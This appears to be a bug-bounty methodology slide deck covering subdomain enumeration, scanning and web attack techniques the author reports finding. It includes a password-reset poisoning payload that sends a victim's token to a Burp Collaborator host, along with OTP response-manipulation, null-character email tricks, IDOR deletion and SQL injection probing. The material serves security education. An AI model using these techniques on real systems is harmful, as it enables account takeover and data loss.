1 of 48

Web Application Hunting Approach

2 of 48

Whoami�?Name : Souvik Roy�CEH Certified

Full Time: Student /Learner

Part Time: Bug-Hunter

3 of 48

Outline

  • Finding & Choosing Targets
  • Enumeration
  • Scanning
  • Analyse
  • Attack

4 of 48

Finding & Choosing Targets

  • Choosing platforms

5 of 48

  • Searching For Company

    • Application Launch Date( Waybackurl )

    • Program Launch Date

6 of 48

  • Selecting Targets

Bounty Rewards Response Time

7 of 48

Enumeration

  • Subdomain Enum
    • Search Engine Dorks
    • Dnsdumpster.com

8 of 48

- Certificate Transparency(CT) project

9 of 48

- ASN Number enum

        • https://bgp.net/

        • Supply all asn number to censys tool , it will fetch all the subdomain
          • censys search  "autonomous_system.asn:AS45530”

10 of 48

- Enumeration using Tools

        • Sublistr3
          • python sublist3r.py -e google,yahoo,virustotal -d example.com
        • Amass
          • amass enum --passive -d example.com
        • Oneforall
          • Python oneforall.py –target example.com run 

11 of 48

  • Shortlist Subdomain

Tools

CT Project

ASN

Duplicates & Dead S-domains

Httpx & sort –u | uniq

Unique & Alive S-domains

12 of 48

  • Automation vs Manual

It is better to write a script that will automate all the enumeration - fetch all subdomain using tools

- fetch all subdomain from CT project

- fetch all ASN number and subdomains

- filter-out all the dups and alive s-domains

13 of 48

  • FDNS

project sonar that gather Internet wide scan data and make it available to researchers and the security community.

curl -silent https://scans.io/data/rapid7/sonar.fdns_v2/filename.json.gz | pigz -dc | grep “.domain.com” | jq

14 of 48

Scanning

    • Select a subdomain “home.domain.com”
    • Find the technology the website is using
      • Wapplyzer
      • Builtwith
      • Whatweb

15 of 48

    • Perform Port scan on the subdomain
      • Naabu
      • Rust Scan

16 of 48

    • Fetch all the urls from the website

    • Fetch all the JS file
      • Using subjs

      • Find links inside all the js file ( using linkfinder)

17 of 48

      • Find Secrete creds inside the js file (secretefinder tool)

      • Create wordlist using the endpoints inside the JS Files (getjswords.py)

    • Perform DIR Bruteforce

18 of 48

    • CMS Scan

19 of 48

Analyse

  • Be a good user
          • Open Burp suite
          • Add domain to scope
          • Start using the web-application
          • Use notion software to store req

20 of 48

  • Understand How the Logic works
          • What request are send out
          • What response do you get on valid request
          • What response do you get on In-valid request
          • Keep notes of all the request and response

  • Take a Break

21 of 48

Attack

  • Low Hanging Fruits
      • Easy to Find
      • No need Burpsuite
      • But you may get Duplicate

Bug Duplicate

22 of 48

  • Broken Links Hijacking
    • Every web app has social media link in footer
    • Open all the links and check , if the links show something like page not found or user not found
    • That means the link is broken and no social media account exist with that user name
    • Create a account using that user-name and the link will be hijacked

h

          • pa

no user found

user founded attacker

23 of 48

24 of 48

  • Subdomain Takeover
        • This happens when the subdomain has a canonical name (CNAME) in DNS,
        • But no host is providing content for it. 

25 of 48

26 of 48

  • Open Redirect

27 of 48

  • Session Expiration Issue
    • Login with the same account in two different browser.
    • Try to change password from one browser.
    • You need to check if both the account get logout or not
    • If the another account session doesn't expire.
    • Then there is a Session Expiration Issues

28 of 48

  • Business Logic Bugs
    • Registration Page

What operation does registration page do ?

1. Take input from user

2. Make sure that , email or username doesn't exist

3. Then it perform verification

          • Verification By OTP/ Token

4. It will perform INSERT operation

29 of 48

  • Unauthorized Group Membership Addition Bug

a. This web application provide feature to create groups.

b. The user who want to add member has to provide the username of the people to whom he/she wants to add .

c. It will send email to those username , and if user click on that link , he/she will be added to that .

I was able to add my account to any of the existing groups

30 of 48

    • During registration , If I add any existing Group number then it showed “Group Already Exist”

    • So , I added %09 null character and The request was successful

31 of 48

  • OTP Bypass (Response Manipulation)

a. This web application verify user using OTP.

b. The OTP is send in a phone number.

c. Put the wrong OTP and intercept the response

d. Edit the response and make it {“success”:true} & Forward it

32 of 48

    • The request

    • The Response

    • Edit the Response

33 of 48

  • SQL Injection in API call
        • The application was call api , during envelopes/cart
        • Each envelopes has Unique ID

34 of 48

        • So, I forwarded request by putting a single quote &

        • And I got a SQL Error

35 of 48

  • Premium Feature Access
        • The application was providing 2 types of account Premium and Normal
        • The bug lies, in the Update Detail process
        • So in this bug , attacker was able to use premium feature of the application , by using victims premium account
        • The email updating , doesn't have any verification steps
        • I can update my mail to any account , But the mail-ID cant be an existing user of the application.

        • For example , I can update my mail from my1@mail.com to any mail-ID.
        • But I cannot add a mail she@mail.com because it has already account

36 of 48

        • So, I added the victims premium account mail, ending with null character %00 or %09

        • Just Logout and Log-In again
        • The victim mail was added to my account & I was able to access the premium features

37 of 48

  • Privilege Escalation Through IDOR
      • The application was mail sending web-app , that provide feature to send mail.
      • All the mails were stored in the envelopes. The envelopes contain all the info , like the files , the text receiver address etc.
      • So when you try to open your inbox it send a request a get request. With the envelop ID

38 of 48

        • So, I changed the envelop ID to victims ID, to fetch their information.

        • And I got a Error Response

39 of 48

        • Http method allowed

        • The response showed DELETE method is allowed

        • I Fired the delete request, on victim envelop ID

40 of 48

        • I was able to delete the victim envelop

41 of 48

  • Rate Limit
      • So when you fill up the details and press enter button
      • This request will send verification mail and redirect me to the enter OTP page.

      • So I send this to intruder and send the request for 10 times , after that it showed up “ Max Limit ”
      • There was re-send button in Enter OTP page

42 of 48

      • I intercept the request and It showed a different endpoint

      • So I again send this to intruder and send the request for unlimited times and Inbox was flooded with the email

43 of 48

  • Password Reset Poisoing
      • The bug was founded in password reset page
      • The password reset request looks like

      • So I tried multiple parameter pollution like two email parameter or using a list of emails . It failed.

      • The payload which worked was a pipe |

44 of 48

      • Sending a request , using pipe will send a token which looks like
      • The request

      • So I tried inject html code and to redirect the code to my burp collaborator link

email=victimsmail@yahoo.com|"/><a href="http://mc29f04J4p0qlm.burpcollaborator.net?do=sendToken

      • The request send a email to victim

45 of 48

      • The victim will get a mail, which will has a button with a url

<a href="http://mc29f0dp4apo1hcbk2xvzm5dt2. burpcollaborator.net?do=sendToken&token=A5Dds4JERBbh sd0511...> Click Here </a>

      • On clicking the URL it will send the token to the burp (Attacker)

      • Using the token , account password can rest

46 of 48

  • Some List of bugs in password reset

    • Token in response
        • Whenever a request is generated for sending password reset token
        • Do intercept the response
        • It may contain OTP or Token

    • Token Doesn't Expire
        • Send a request for password reset.
        • Check if the token expire or not , once it is used.

47 of 48

    • Host Header Injections

    • Old Email Token Doesn't Expire
        • Send a Password reset request
        • You will receive token , but don’t use it
        • Now Login to the account and change your email-address
        • Now Try to reset password using the old email password reset token

48 of 48